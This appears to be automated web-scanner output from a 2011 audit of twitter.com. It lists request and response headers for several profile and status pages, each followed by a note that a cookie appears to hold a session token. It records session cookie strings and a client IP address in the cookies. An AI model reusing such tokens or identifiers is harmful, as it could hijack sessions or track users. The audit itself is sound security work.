HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:28:43 GMT Server: hi Status: 200 OK X-Transaction: 1296224923-90834-17466 ETag: "5608c66aeb64567924807b23b0514ade" Last-Modified: Fri, 28 Jan 2011 14:28:43 GMT X-Runtime: 0.05594 Content-Type: text/html; charset=utf-8 Content-Length: 13806 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjlodHRwOi8vdHdpdHRlci5jb20vb25seWphenov%250Ac3RhdHVzLzI5OTI0NTA1MDAyNDQ2ODQ5Ogxjc3JmX2lkIiVjZGY1NzI3MTNk%250ANzEzZDVmYzU1N2MyZWJiOTIxMWNhMzoHaWQiJTFjOTUzNDgxYTQyZmRlOWMw%250AYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07w%250AzC0B--92541950a44bd04792a3b27273e15bc7882e2cca; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /oschina HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:28:47 GMT Server: hi Status: 200 OK X-Transaction: 1296224927-42931-41515 ETag: "4ec91c8ea22a5f99253e904c27c6fcbf" Last-Modified: Fri, 28 Jan 2011 14:28:47 GMT X-Runtime: 0.00766 Content-Type: text/html; charset=utf-8 Content-Length: 42639 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /oschina/status/28102821484171264 HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:28:51 GMT Server: hi Status: 200 OK X-Transaction: 1296224931-1588-6053 ETag: "74e24e45fa1e508376ab48a014b754fb" Last-Modified: Fri, 28 Jan 2011 14:28:51 GMT X-Runtime: 0.05739 Content-Type: text/html; charset=utf-8 Content-Length: 13642 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjhodHRwOi8vdHdpdHRlci5jb20vb3NjaGluYS9z%250AdGF0dXMvMjgxMDI4MjE0ODQxNzEyNjQ6DGNzcmZfaWQiJTEwZDU0OTEzNjYw%250AOWY1ZTk1YmNlOWQ5ZWI3Njc5ZjczOgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBj%250ANzRhZWQ1NzkxZjJmNjQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZs%250AYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6D2NyZWF0ZWRfYXRsKwgzTvDM%250ALQE%253D--68179dfd893f83c3d5cc5cabbcfb96d9a300ec19; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /oschina/status/30099933486915584 HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:28:50 GMT Server: hi Status: 200 OK X-Transaction: 1296224930-28853-36094 ETag: "f8b960d6a56094881d4f6783365ecf28" Last-Modified: Fri, 28 Jan 2011 14:28:50 GMT X-Runtime: 0.06167 Content-Type: text/html; charset=utf-8 Content-Length: 13721 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjhodHRwOi8vdHdpdHRlci5jb20vb3NjaGluYS9z%250AdGF0dXMvMzAwOTk5MzM0ODY5MTU1ODQ6DGNzcmZfaWQiJWZkOWU3MGFjNzg5%250ANmVhNjZmOTMxN2NlNjZmMGExNWNkOgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBj%250ANzRhZWQ1NzkxZjJmNjQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZs%250AYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6D2NyZWF0ZWRfYXRsKwgzTvDM%250ALQE%253D--6d3f8e3e6d67d971b281da438de9b57a6477922e; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /privacy HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:31:20 GMT Server: hi Status: 200 OK X-Transaction: 1296225080-72692-36002 ETag: "728deff396f751fb7d15a00d76938c97" Last-Modified: Fri, 28 Jan 2011 14:31:20 GMT X-Runtime: 0.03526 Content-Type: text/html; charset=utf-8 Content-Length: 18932 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlNGY1MzgyYzMzYTg4Mzg2YTMzY2RlZDc2NjAwMDli%250AMzM6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--0d04f4b19d1ef9fb4248b979f81a1df77a504fb3; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /profile/not_logged_in/malsup HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 404 Not Found Date: Fri, 28 Jan 2011 14:31:21 GMT Server: hi Status: 404 Not Found X-Transaction: 1296225081-23068-11363 Last-Modified: Fri, 28 Jan 2011 14:31:21 GMT Content-Type: text/html; charset=utf-8 Content-Length: 9230 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rachbarnhart HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:34 GMT Server: hi Status: 200 OK X-Transaction: 1296225034-44205-8520 ETag: "2d3e9ea7bdf09844d1aed67d3b8c66fc" Last-Modified: Fri, 28 Jan 2011 14:30:34 GMT X-Runtime: 0.01426 Content-Type: text/html; charset=utf-8 Content-Length: 52627 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rem HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:36 GMT Server: hi Status: 200 OK X-Transaction: 1296225036-70162-12873 ETag: "f1048f44c2dbfae0ca279695ab2f56e2" Last-Modified: Fri, 28 Jan 2011 14:30:36 GMT X-Runtime: 0.00958 Content-Type: text/html; charset=utf-8 Content-Length: 54681 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rickrussie HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:14 GMT Server: hi Status: 200 OK X-Transaction: 1296225014-95753-62367 ETag: "8ac086fffec8d5f0dbc55eb3e67e6a96" Last-Modified: Fri, 28 Jan 2011 14:30:14 GMT X-Runtime: 0.00915 Content-Type: text/html; charset=utf-8 Content-Length: 51643 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rickrussie/status/28548182396903424 HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:15 GMT Server: hi Status: 200 OK X-Transaction: 1296225014-32961-2577 ETag: "d46b26b9fe929840b674f147c0c89142" Last-Modified: Fri, 28 Jan 2011 14:30:14 GMT X-Runtime: 0.33011 Content-Type: text/html; charset=utf-8 Content-Length: 13807 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjtodHRwOi8vdHdpdHRlci5jb20vcmlja3J1c3Np%250AZS9zdGF0dXMvMjg1NDgxODIzOTY5MDM0MjQ6DGNzcmZfaWQiJTExNDc5ZjQ5%250AMmU2NjM5OTY2ODQ3NTY5ZjUxYWFlNjlmOg9jcmVhdGVkX2F0bCsIM07wzC0B%250AOgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBjNzRhZWQ1NzkxZjJmNjQiCmZsYXNo%250ASUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1%250Ac2VkewA%253D--3d3bd2cab72fb51e93b5fed240300828d4f6844c; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /roctimo HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:29:11 GMT Server: hi Status: 200 OK X-Transaction: 1296224951-66281-31354 ETag: "9b0bbae04a168790126e11b0e79fd723" Last-Modified: Fri, 28 Jan 2011 14:29:11 GMT X-Runtime: 0.01993 Content-Type: text/html; charset=utf-8 Content-Length: 39421 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /roctimo/status/29669358812790784 HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:29:12 GMT Server: hi Status: 200 OK X-Transaction: 1296224952-82366-17089 ETag: "352d65a2c5752e7711f2873e5d5683dc" Last-Modified: Fri, 28 Jan 2011 14:29:12 GMT X-Runtime: 0.06219 Content-Type: text/html; charset=utf-8 Content-Length: 13608 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjhodHRwOi8vdHdpdHRlci5jb20vcm9jdGltby9z%250AdGF0dXMvMjk2NjkzNTg4MTI3OTA3ODQ6DGNzcmZfaWQiJWRhM2Y2NDUyMWY4%250AOWYxMzc2YjkzMTBhNGFhODkyOTBlOgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBj%250ANzRhZWQ1NzkxZjJmNjQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZs%250AYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6D2NyZWF0ZWRfYXRsKwgzTvDM%250ALQE%253D--160e3ed7351db2a00b10df68a0ea6d7aa90fed75; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rwaldron HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:31:12 GMT Server: hi Status: 200 OK X-Transaction: 1296225072-30588-18769 ETag: "467245d95e03c9c4efa08a62b5cdfe26" Last-Modified: Fri, 28 Jan 2011 14:31:12 GMT X-Runtime: 0.01191 Content-Type: text/html; charset=utf-8 Content-Length: 52265 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
